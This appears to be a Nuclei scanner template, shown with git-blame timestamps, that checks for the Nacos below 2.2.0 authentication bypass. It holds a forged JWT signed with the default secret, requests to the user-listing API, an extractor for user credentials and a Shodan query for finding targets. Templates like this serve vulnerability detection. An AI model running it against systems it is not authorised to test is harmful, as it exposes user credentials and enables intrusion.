2023-03-21 08:34:06 +00:00
|
|
|
id: nacos-authentication-bypass
|
2023-03-17 02:15:42 +00:00
|
|
|
|
|
|
|
info:
|
2023-03-21 08:34:06 +00:00
|
|
|
name: Nacos < 2.2.0 - Authentication Bypass
|
2023-03-17 02:15:42 +00:00
|
|
|
author: Esonhugh
|
|
|
|
severity: critical
|
|
|
|
description: |
|
2023-03-21 08:34:06 +00:00
|
|
|
The authentication function of Nacos is can be bypass through default JWT secret.
|
2023-03-17 02:15:42 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/alibaba/nacos/issues/10060
|
|
|
|
- https://avd.aliyun.com/detail?id=AVD-2023-1655789
|
|
|
|
- https://nacos.io/zh-cn/docs/auth.html
|
2023-03-21 08:34:06 +00:00
|
|
|
remediation: Change value of jwt secret in the configurations
|
2023-03-21 08:44:15 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 2
|
2023-03-21 08:44:15 +00:00
|
|
|
verified: "true"
|
|
|
|
shodan-query: title:"Nacos"
|
2023-03-21 08:34:06 +00:00
|
|
|
tags: auth-bypass,nacos,misconfig,jwt
|
|
|
|
|
|
|
|
variables:
|
|
|
|
token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g
|
2023-03-17 02:15:42 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2023-03-17 02:15:42 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}"
|
|
|
|
- "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}"
|
2023-03-21 08:34:06 +00:00
|
|
|
stop-at-first-match: true
|
2023-03-17 02:15:42 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- '"username":'
|
|
|
|
- '"password":'
|
|
|
|
condition: and
|
2023-03-21 08:34:06 +00:00
|
|
|
|
2023-03-17 02:15:42 +00:00
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "application/json"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-03-21 08:34:06 +00:00
|
|
|
|
2023-03-17 02:15:42 +00:00
|
|
|
extractors:
|
|
|
|
- type: json
|
|
|
|
part: body
|
2023-03-21 08:34:06 +00:00
|
|
|
name: extracted-credentials
|
2023-03-17 02:15:42 +00:00
|
|
|
json:
|
2023-03-21 08:39:52 +00:00
|
|
|
- ".pageItems[]"
|